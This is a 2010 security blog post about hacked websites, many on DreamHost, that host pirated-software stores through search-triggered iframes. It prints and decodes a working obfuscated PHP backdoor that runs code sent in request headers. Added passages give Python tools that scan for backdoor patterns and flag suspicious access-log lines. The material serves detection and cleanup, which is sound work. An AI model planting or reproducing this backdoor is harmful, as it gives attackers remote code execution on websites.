
Hackers Turn Legitimate Websites into Underground Software Stores

10 Dec 10 | Filed in Website exploits

This is the time of the year when online sellers do their best to attract herds of holiday shoppers. Software pirates are no different. They offer huge discounts (up to 95%) for popular and expensive software products and provide user-friendly online stores. They even made their sites one step closer to you!

I’ve already written about the black hat SEO schemes that pirates use to drive traffic to their sites. They all involve compromising established legitimate sites and poisoning the first pages of Google’s search results with links to doorway pages on hacked sites, which redirect searchers further to illegal stores on servers controlled by criminals.

The doorway pages on legitimate websites are an important part of the scheme:

  • They are the pages that pirates promote in search engines
  • They take advantage of the established reputation of the hacked site, and thus require less effort to reach high rankings
  • They channel search traffic to underground websites
  • They hide underground websites from search engines
  • They transparently redirect traffic to new sites when criminals change domain names of their resources.

Eliminating doorway pages

However, there is a new development in this area. Instead of placing just doorway pages on compromised sites, hackers now create whole online stores there.

Here’s how it works: the keyword-rich spammy web pages on hacked sites check whether a visitor comes from a search engine and inject a full-screen iframe at the very top of the web page. The iframe contains a familiar “software discounter” online store (identical to the ones I wrote about before).

[Screenshot: software discounter in an iframe]

Note the double scrollbars on the screenshot: one pair of scrollbars belongs to the iframe and the other to the entire web page. If you scroll down, you’ll see the normal content of that web page.

Not every visitor from search engines sees that iframe. If the search query includes a “site:” operator, the iframe is not injected into the landing pages. Probably the idea was to hide the shop from webmasters who use “site:” searches. However, the implementation of this idea is quite stupid: while the shop iframe is not visible, the spammy content on the landing page remains intact, so a webmaster will immediately notice the compromise.

Local store pages

Although iframes can load web pages from third-party sites, in this case they load the “shop” pages from the same site. Here is a typical iframe injected at the very bottom of a landing page:

<iframe border=0 style="border:none" width="100%" height="100%" src="/?vprx=1&prx=nUE0pQbiY2kcqzHgp29zqUqupzHhozI0Y3Abo3Nip2IupzAbYm9mCJSlL2ucL2SxWzAjow02ZwD%3D&nd=Ym92pUW4CGRzpUW4CJ5IEGOjHJWcJGWeL3S6FTqjZwy6pIIkqKO6FTuirxxjJGAOLz8mGzyjZxy1pUcOLyygBJ1QFyAfGQW1L0jlH3uKrxSdo3pjZyc3EPHmEN%3D%3D"></iframe>

To make sure that styles and scripts on a hijacked web page don’t interfere with the shop iframe, hackers make the following change to the <body> tag:

<body style="margin:0px;padding:0px;width:100%;height:100%"><script>document.write('<noscript>');</script>

All images and style sheets are also loaded from the same domain, and they all share a similar URL structure, something like this:

/?vprx=1&prx=nUE0pQbiY2kcqzHgp29zqUqupzHhozI0Y2ygLJqypl9wLKEuoT9aqJHiAwV2K2kcp3DhnaOa

The indexed landing pages have URLs that also follow a specific pattern: example.com/?word=number or example.com/path/file?word=number

This makes me think that the index files on these sites contain injected code that processes requests with specific parameters to generate the spammy landing pages (?word=number) and the “shop” web pages (?vprx=1&prx=…).

Here is a list of real landing pages on compromised sites.

Poisoned search results

These rogue sites do pretty well in search results:

[Screenshots of search results for “buy Graphisoft ArchiCAD” and “buy discount Dragon NaturallySpeaking 10”]

On the latter screenshot, you can see that Google considers the rogue site on the-dream.co.uk such a good match for the query (which returns 178,000 results) that it deserves 3 positions on the first page of search results plus the “+ show more results from the-dream.co.uk” link.

DreamHost

Maybe it’s just a coincidence, but about 85% of the hacked sites with installed pirated software stores were found on different IPs on DreamHost networks:

  • 5 sites on 75.119.192.0 – 75.119.223.255 (United States Brea New Dream Network Llc)
  • 9 sites on 67.205.0.0 – 67.205.63.255 (United States Brea New Dream Network Llc)
  • 16 sites on 69.163.128.0 – 69.163.255.255 (United States Brea New Dream Network Llc)

Most of these sites are on shared servers, and when I check other sites on those servers I usually find a few more with spammy links and doorway pages.

This distribution of hacked sites makes me suspect that DreamHost servers are somehow attractive to hackers. Probably there is a way for attackers to hop from server to server and search for hackable sites.

The same black-hat SEO campaign

As far as I can see, the rogue software stores on hacked legitimate sites are basically the same as the ones on dedicated servers that I described both last week and a year ago. Their look and feel is the same, and on the final “checkout” step they redirect to the well-known “paym8” sites (e.g. payment8ltd .net/shop/order/ or 8payment. net/shop/order/).

I still don’t have enough information on how these shops work internally. I tried to contact the webmasters of compromised sites, but so far have only received a couple of backdoor scripts. For example, this file called .php:

<?php
$_0f4f6b="\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65";$_0f4f6b("\x7c\x2e\x7c\x65","\x65\x76\x61\x6c\x28\x27\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7\x22\x29\x29\x3b\x27\x29",'.');
?>

Decoding the hex escapes gives preg_replace("|.|e", "eval('eval(base64_decode(\"...\"));')", '.'). The deprecated e modifier makes preg_replace evaluate the replacement string as PHP code, and the base64 blob inside it translates to something like this:

if (md5($_SERVER['HTTP_QUOTE']) == 'e66e6cadd6e13efea54ed50c0eb2d32b' and isset($_SERVER['HTTP_X_CODE']))
    @eval(@base64_decode(strrev(@$_SERVER['HTTP_X_CODE'])));

In other words, a request whose Quote header hashes to the hard-coded value makes the script execute whatever reversed, base64-encoded PHP arrives in its X-Code header.
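As an added defender-side example that is not part of the original post, here is a small Python scanner that looks in PHP source for the traits of this backdoor: runs of hex-escaped characters, a preg_replace pattern carrying the e modifier, eval of base64_decode, and triggers keyed off request headers. The sample file is constructed for this example with a harmless echo as payload and a placeholder in place of the md5 value.

```python
import base64
import re

# Constructed sample with the shape of the backdoor above, not the page's own
# file: the inner payload is a harmless echo and the md5 value is a placeholder.
_INNER = ("if(md5($_SERVER['HTTP_QUOTE'])=='PLACEHOLDER_MD5' "
          "and isset($_SERVER['HTTP_X_CODE'])) echo 'constructed';")
_B64 = base64.b64encode(_INNER.encode()).decode()
SAMPLE_BACKDOOR = "\n".join([
    "<?php",
    r'$_0f4f6b="\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65";',
    r'$_0f4f6b("\x7c\x2e\x7c\x65", "eval(base64_decode(\"' + _B64 + r'\"));", ".");',
    "?>",
])
SAMPLE_CLEAN = '<?php\necho htmlspecialchars($_GET["q"] ?? "");\n?>'

HEX_RUN = re.compile(r'(?:\\x[0-9a-fA-F]{2}){4,}')   # "\x70\x72..." runs
B64_RUN = re.compile(r'[A-Za-z0-9+/]{24,}={0,2}')    # long base64-looking tokens


def deobfuscate(src):
    """Decode \\xNN runs in place and append any base64 blobs that decode to text."""
    out = HEX_RUN.sub(
        lambda m: bytes.fromhex(m.group(0).replace('\\x', '')).decode('latin-1'), src)
    for blob in B64_RUN.findall(out):
        try:
            out += '\n' + base64.b64decode(blob, validate=True).decode('utf-8')
        except (ValueError, UnicodeDecodeError):
            pass  # not real base64, or binary data: ignore
    return out


def scan(src):
    """Return the indicator names that fire for one PHP source text."""
    dec = deobfuscate(src)
    hits = []
    if HEX_RUN.search(src):
        hits.append('hex_escaped_strings')
    # A delimited pattern literal whose modifiers include "e": the preg_replace
    # /e trick that evaluates the replacement string as PHP.
    if 'preg_replace' in dec and re.search(r'["\']([^\w\s\\])[^"\']*\1\w*e\w*["\']', dec):
        hits.append('preg_replace_e_modifier')
    if re.search(r'eval\s*\(\s*@?\s*base64_decode', dec):
        hits.append('eval_of_base64')
    if re.search(r"\$_SERVER\s*\[\s*['\"]HTTP_", dec):
        hits.append('request_header_trigger')
    return hits
```

Run scan() over every .php file in the web root; any file that fires more than one indicator deserves a manual look, and deobfuscate() shows what the hex and base64 were hiding.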

To webmasters

I guess it is clear that illegal online stores create serious problems for the owners of compromised sites. Not only can they hurt search engine rankings for normal keywords and incur penalties, but they may also be a reason to remove your website from a server (most hosting ToS prohibit selling pirated software).

Please check the doorway/spammy link detection instructions that I posted last week; they are also useful for revealing any unwanted content on your site, including such rogue stores.

You should also regularly check access logs (not just Google Analytics, which only tracks visitors with JavaScript enabled) for suspicious requests; they may help you identify backdoor scripts, vulnerable files and rogue sections of your site. Pay special attention to POST requests.
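As an added example that is not part of the original post, the following Python snippet applies these checks to Apache combined-format access log lines: requests with a single word=number query parameter (the landing page pattern), especially those arriving from a search engine; requests with vprx=1&prx=… (the shop pages and their assets); and POST requests to dot-files such as the .php backdoor. The log lines, IPs, hostnames and the prx token are all constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache "combined" log lines modelled on the patterns described
# in the post; the IPs, hosts, paths and the prx token are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2010:10:01:12 +0000] "GET /?software=792 HTTP/1.1" 200 8421 "http://www.google.com/search?q=buy+discount+software" "Mozilla/5.0"
203.0.113.5 - - [10/Dec/2010:10:01:13 +0000] "GET /?vprx=1&prx=CONSTRUCTED_TOKEN HTTP/1.1" 200 30211 "http://example.com/?software=792" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2010:10:02:40 +0000] "GET /about.html HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Dec/2010:10:03:01 +0000] "POST /.php HTTP/1.1" 200 14 "-" "Python-urllib/2.6"
198.51.100.9 - - [10/Dec/2010:10:03:05 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://example.com/blog/" "Mozilla/5.0"
192.0.2.3 - - [10/Dec/2010:10:04:00 +0000] "GET /index.php?great_deal=389 HTTP/1.1" 200 8390 "http://www.bing.com/search?q=cheap+archicad" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')
SEARCH_ENGINE_RE = re.compile(r'https?://(www\.)?(google|bing|yahoo)\.', re.I)


def classify(line):
    """Return the reasons a log line looks like doorway, shop or backdoor traffic."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group('target'))
    params = parse_qsl(parts.query, keep_blank_values=True)
    reasons = []
    # Landing pages: any path plus exactly one "word=number" parameter.
    if len(params) == 1 and re.fullmatch(r'[A-Za-z_-]+', params[0][0]) and params[0][1].isdigit():
        reasons.append('doorway-style query')
        if SEARCH_ENGINE_RE.match(m.group('referer')):
            reasons.append('search-engine referrer')
    keys = dict(params)
    if keys.get('vprx') == '1' and 'prx' in keys:   # shop pages and their assets
        reasons.append('shop iframe request')
    if m.group('method') == 'POST' and parts.path.rsplit('/', 1)[-1].startswith('.'):
        reasons.append('POST to hidden file')       # e.g. the ".php" backdoor
    return reasons


def scan_log(text):
    """Map each suspicious request target to its reasons, with per-reason counts."""
    flagged, counts = {}, Counter()
    for line in text.splitlines():
        reasons = classify(line)
        if reasons:
            flagged[LOG_RE.match(line).group('target')] = reasons
            counts.update(reasons)
    return flagged, counts
```

The word=number rule also matches legitimate short permalinks such as WordPress’s ?p=68, so treat it as a lead to review together with the referrer and the page content, and whitelist the parameters your own site uses.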

Make sure that your files and directories are not world-writable. Leaving anything that your server neighbors can write to is an invitation to abuse of your site.

Finally, if you find one of these shops on your site, you should contact the pirates (they provide a toll-free contact phone number +1-866-576-8741) and ask for your share in sales (don’t agree to less than 50%).

As always, I’m interested in any internal information about this sort of hack. If you are the webmaster of a hacked site, or a representative of a hosting provider, please share your findings here in the comments, or, if you don’t want to publicly disclose any sensitive information, you can contact me directly. Thanks.

Reader's Comments (2)

  1.

    [...] This post was mentioned on Twitter by John Mueller and Denis, PhysicalDrive0. PhysicalDrive0 said: RT @unmaskparasites: [blog] Hackers Turn Legitimate Websites into Underground Software Stores http://bit.ly/gW2Qle – doorways are not enough [...]

  2.

    If you look at the site similar to the one mentioned above (www.buysupreme.net) and do a reverse DNS lookup, you will see it is hosted in Hong Kong, including the Secure Payment Site.

    They claim to be in Georgia.

    So, it’s always a good idea to do this on any site you are unsure of. It is no guarantee but at least you can see if they are where they say they are.

    I used this site to do the lookup (I am not associated with this site)

    http://www.ipchecking.com